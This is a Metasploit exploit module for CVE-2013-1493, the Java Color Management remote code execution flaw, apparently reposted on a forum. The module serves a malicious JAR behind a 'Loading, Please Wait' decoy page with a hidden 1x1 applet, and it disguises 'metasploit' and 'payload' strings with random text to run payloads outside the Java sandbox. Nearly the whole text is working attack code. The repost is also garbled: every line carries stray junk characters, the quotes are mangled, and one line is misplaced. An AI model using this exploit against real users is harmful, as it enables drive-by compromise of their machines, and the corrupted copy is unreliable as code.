### \% _9 @5 ?, _. H2 y
6 b; k( C G: j3 u& J( x
# This file is part of the Metasploit Framework and may be subject to' s8 t$ Z- w+ J' l/ |( F9 g1 K
# redistribution and commercial restrictions. Please see the Metasploit
, X+ e z/ H; k& K [8 c4 A3 g# web site for more information on licensing and terms of use.3 v+ V7 j0 P4 G9 K4 |- p
# http://metasploit.com/% S: U) Z1 B( j9 h% \
##% `- h5 \8 \$ t
require ‘msf/core’
( H* `+ U2 \) d$ ]5 `require ‘rex’: K) ]1 w6 |+ d% k
class Metasploit3 < Msf::Exploit::Remote
' z z2 b7 p$ D4 X: B9 [8 hRank = NormalRanking
! J2 _! @! G' ^( J& F: n+ }7 Vinclude Msf::Exploit::Remote::HttpServer::HTML
, n8 {- p+ f6 x$ Linclude Msf::Exploit::EXE9 c8 ]( C0 t: m) Z" v/ v
include Msf::Exploit::Remote::BrowserAutopwn
; T6 q6 M; J( U' yautopwn_info({ :javascript => false })
& S0 k0 }, l/ Sdef initialize( info = {} )& ?" F7 `, H- k1 B2 a" h- y( l
super( update_info( info,
! d2 `8 b4 G4 y& U$ P7 u& i‘Name’ => ‘Java CMM Remote Code Execution’,2 t2 j1 H4 u T+ M
‘Description’ => %q{
; [( K0 Y8 {% O6 ~" kThis module abuses the Color Management classes from a Java Applet to run3 X: h6 Q' ?9 E y' F) i% K) S
arbitrary Java code outside of the sandbox as exploited in the wild in February
4 e( N" y! ]; g$ E" R {+ oand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41( [% A( ^. N: j. c2 f S; D7 k& u
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
' D T4 I v3 W$ n3 ?systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
6 g8 L; P8 i1 O: l8 D6 d; Mwarning in order to run the malicious applet.
1 [: L4 D- ~% H* a% M},
) i7 q6 w# c- w |: E‘License’ => MSF_LICENSE,, q/ k, k6 j5 \
‘Author’ =>. [' Z) I) g+ ~$ Q. |! J
'Unknown', # Vulnerability discovery and Exploit
+ L6 D) V0 Q8 k8 c'juan vazquez' # Metasploit module (just ported the published exploit): _: T R7 X5 i) X, c& \* _8 N$ M
],* c/ v* X v. l r# S
‘References’ =>* ]9 g2 r' ?7 c5 K: Z w
[
b9 d5 T) x1 t$ u[ 'CVE', '2013-1493' ],
) w( ]! K. W' |2 ~+ v! V[ 'OSVDB', '90737' ],
; J% U0 E' x- b4 C7 z: _& T[ 'BID', '58238' ],
* F* t# z8 T5 ?. E& @' o% p[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
2 k0 g% ~/ W& B5 X[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
+ Y1 k8 v z5 Z# V- h W1 r& m[ 'URL', 'http://pastie.org/pastes/6581034' ]
. U/ N+ `3 w2 X# ~2 k],
8 ?9 `4 a5 m: k3 a‘Platform’ => [ 'win', 'java' ],' _+ h2 c1 \" O( c, M& k) T
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },* U( x) F5 m/ B$ M7 `7 E
‘Targets’ =>% R( I0 Z* c0 a$ @
[
3 {5 Z: L2 Z5 z+ V4 G* s[ 'Generic (Java Payload)',
: C K! @: x; d9 ~+ Q" X{4 g( e" `8 u9 [
'Platform' => 'java',
9 y9 C8 X6 \9 G- p7 Y5 n, T1 i p0 l'Arch' => ARCH_JAVA$ S- q# o! T9 K6 }6 |% h
}- z" V' ~( y3 l4 l& a& e
],9 B1 i1 w% N* ?+ n" E. _8 F6 Z, E
[ 'Windows x86 (Native Payload)',
8 X, j2 [4 L4 x: ?4 {/ m9 j; @{& y Z1 i! \; t4 W Q& X" k
'Platform' => 'win', L: P+ _+ } i- T; C
'Arch' => ARCH_X86& _; J0 R+ j( Q1 [& y
}. ?" D0 ^+ A# ~; b3 D6 ?# A
]
; w$ m1 T- ?! e5 A0 |],
+ a! E+ k @5 Q! D+ w! g) D‘‘DisclosureDate’ => ‘Mar 01 2013′
n- @4 E; h* m, R6 \))9 ~- Q) m2 s4 k
end
, L3 U6 }4 b6 Sdef setup
5 o6 j2 N5 K; |0 w5 Ppath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)0 w# D; _7 G" V# a$ C) H* A
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 [! J# m4 V* Cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
u5 M# m2 {( t2 u( N! V& ~6 \@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 v5 S- r4 Y. H$ N8 U* Apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)8 O& H9 r! F) z+ x- J# X% U
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# w" @+ W# ?; z& E# V
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
5 e& T$ e8 I" x% R: l@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 x3 G7 }( p- `. w. L! o' g@init_class_name = rand_text_alpha(“Init”.length)
5 m1 }% G, z G. F* Y- l5 `@init_class.gsub!(“Init”, @init_class_name)
! U/ d. \( X3 G' E4 T# }super4 _0 J. z' G4 y$ d3 W
end! T( ?. x4 Q# K* j" D" c8 r
def on_request_uri(cli, request)1 }$ M9 A4 V# T6 ^, a
print_status(“handling request for #{request.uri}”)) X' h6 K0 `5 I3 D8 W
case request.uri. X1 N& Z- S F2 [
when /\.jar$/i# F1 Z: ]4 n7 A2 A% |% Q6 I
jar = payload.encoded_jar
3 f7 o( Z3 d1 {. w8 G5 H( N& yjar.add_file(“#{@init_class_name}.class”, @init_class)* X* C/ K- ~5 p& F
jar.add_file(“Leak.class”, @leak_class)
; j: C- `! N, W7 w5 Ujar.add_file(“MyBufferedImage.class”, @buffered_image_class)4 _. t+ U& v4 s) N
jar.add_file(“MyColorSpace.class”, @color_space_class)
+ x5 [9 B: R/ j; X$ O3 `DefaultTarget’ => 1,; f1 ]' s8 ?5 p
metasploit_str = rand_text_alpha(“metasploit”.length)
h1 V& i. H+ ?' R* Z7 y2 epayload_str = rand_text_alpha(“payload”.length)
l. B4 H4 F q( c" q8 y/ Wjar.entries.each { |entry|4 i/ A1 ^+ I+ H) _" U' K" i2 D6 P. w
entry.name.gsub!(“metasploit”, metasploit_str)
- l" [7 Z9 _- h" m: Rentry.name.gsub!(“Payload”, payload_str)
# e' C) \0 w; s) centry.data = entry.data.gsub(“metasploit”, metasploit_str)9 s1 i; t2 s$ C( e* x! C) A- c" v' F
entry.data = entry.data.gsub(“Payload”, payload_str)
0 g4 b& o n0 X) l/ @ X' H- I. d& a}' d5 L8 [3 x6 Z& P6 w9 A3 X
jar.build_manifest
+ v; D4 C6 \0 N) |$ t" [. ysend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })5 z! P3 G/ r" T- J+ M
when /\/$/
& d" V A. R2 j4 ^. K/ kpayload = regenerate_payload(cli), @1 A6 Q% V; N$ Q1 x: j
if not payload; ]8 ]7 I8 ?- V b6 ]1 f
print_error(“Failed to generate the payload.”)4 f9 `. E, w) o& D7 D U
send_not_found(cli)) h/ Y1 z$ j, p0 z* q
return/ S3 {( T; |5 B+ S# J. _' _+ j
end( G% Z+ e8 I5 @! F0 K
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
- w9 w8 r0 S* B4 \5 m) w; J6 delse% k b5 v% N& ]5 Y# x5 w+ y, e
send_redirect(cli, get_resource() + ‘/’, ”)
4 c1 d( [! u* [+ ]1 nend* W, [ t' V7 Y. B
end
1 U; r6 m. I8 |. ldef generate_html
2 [ o4 ^2 M" o- [* q8 Shtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|8 q7 e! L4 s$ U" m& D1 a* @+ U, u% D# F
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|8 @5 \' J! C- v, |: j
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|' ^9 E0 [3 I4 t6 | X
html += %Q|</applet></body></html>|
3 D* y G5 \. A- G& Vreturn html
6 \$ C: V( z& a0 ^$ b0 zend
, D. n( ], O) K( l& r3 a3 h& w+ fend
' O% o: { |" R2 `- Zend ]: u3 \$ ~4 X5 u3 }7 V" t
|
发表于 2013-4-4 17:31:17
收藏
支持
反对